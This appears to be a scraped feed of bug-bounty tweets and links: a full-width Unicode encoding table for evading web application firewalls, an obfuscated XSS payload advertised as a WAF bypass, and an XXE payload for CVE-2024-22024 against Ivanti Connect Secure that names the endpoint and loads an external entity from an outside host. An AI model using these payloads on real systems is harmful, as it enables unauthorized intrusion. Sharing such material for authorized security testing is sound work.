Full-width version of common symbols ＜ = %EF%BC%9C = \uFF1C ⇒ %3C (<) ＞ = %EF%BC%9E = \uFF1E ⇒ %3E (>) ＼ = %EF%BC%BC = \uFF3C ⇒ %5C (\) ／ = %EF%BC%8F = \uFF0F ⇒ %2F (/) ＇ = %EF%BC%87 = \uFF07 ⇒ %27 (') ＂ = %EF%BC%82 = \uFF02 ⇒ %22 (") %0A (LF) ⇒

Want to make big $$$ bypassing WAF for injections such as SQLi, RCE, XSS? Learn the technology you are injecting into. Read the docs or RFC. Understand what the code / query / template is doing. WAF bypass is not hard but it requires more effort than copy/paste payloads.

It’s awesome to receive a payment from a bug you reported 8 months ago 😝… who wait longer than that, comment below 👇

A payload to bypass WAF, published by Clandestine <detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//

Someone just sent me an XSS to collaborate on. It was an interesting case so I thought I'd tweet about it. They'd found an xss in auth.example.com, which was a subdomain that is only used to authenticate users. They were having trouble escalating the XSS because this

While testing targets, you must always check all results from your requests. I'll explain how I found out second order SQL Injection on one of recent engagement at Synack Red Team 1/n. #BugBounty #bugbountytip

Reversing and Tooling a Signed Request Hash in Obfuscated JavaScript buer.haus/2024/01/16/rev…

If you want to make use of Frans Rosén's postmessage-tracker extension, but are a Firefox user, you can use this version instead 👍 github.com/ACK-J/postMess…

Red Team Courses · GitHub gist.github.com/soheilsec/8310…

Found some interesting bugs in Excalidraw used in Meta Messenger (w Nagli and Joel Margolis (teknogeek)) as well as Microsoft Whiteboard some time ago. Here's the writeup! spaceraccoon.dev/clipboard-micr…

CVE-2024-22024, XXE on Ivanti Connect Secure payload encoded base64: <?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r> send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm #bugbountytips #cve #Ivanti

Redteam mindmap xmind.app/m/9Zcnkq/

A few months ago, Mohammad Nikouei and I teamed up to work on a famous public bug bounty program at @bugcrowd. We ended up earning a sweet $20,300 bounty. Here's the write up, I hope you enjoy it. blog.voorivex.team/20300-bounties…

If you have trouble keeping up with security research, security news, new technical content, make sure you check out: talkback.sh by elttam

Account takeover techniques

New Burp Suite Professional Testing Handbook from Trail of Bits 📚 Check out this step-by-step guide, created by Trail of Bits, to rapidly master Burp and optimize the testing of your app! Testing Handbook: appsec.guide/docs/web/burp/ x.com/clintgibler/st…

Learn how to conceal payloads in URL credentials and abuse them for DOM XSS and DOM Clobbering. portswigger.net/research/conce…

🔗In this article we talk about how I exploited a Fortune 500 Through Hidden Supply Chain Links Link 👇 landh.tech/blog/20241028-… Thanks to the entire HashiCorp team ! 🤟 Enjoy 🔥

A brief JavascriptCore RCE story by Lan Vu and An Nguyễn qriousec.github.io/post/jsc-unini…

If you want to know how to bring your own IDP in Entra, and abuse OIDC protocols for persistence, my x33fcon talk is now on YouTube 😀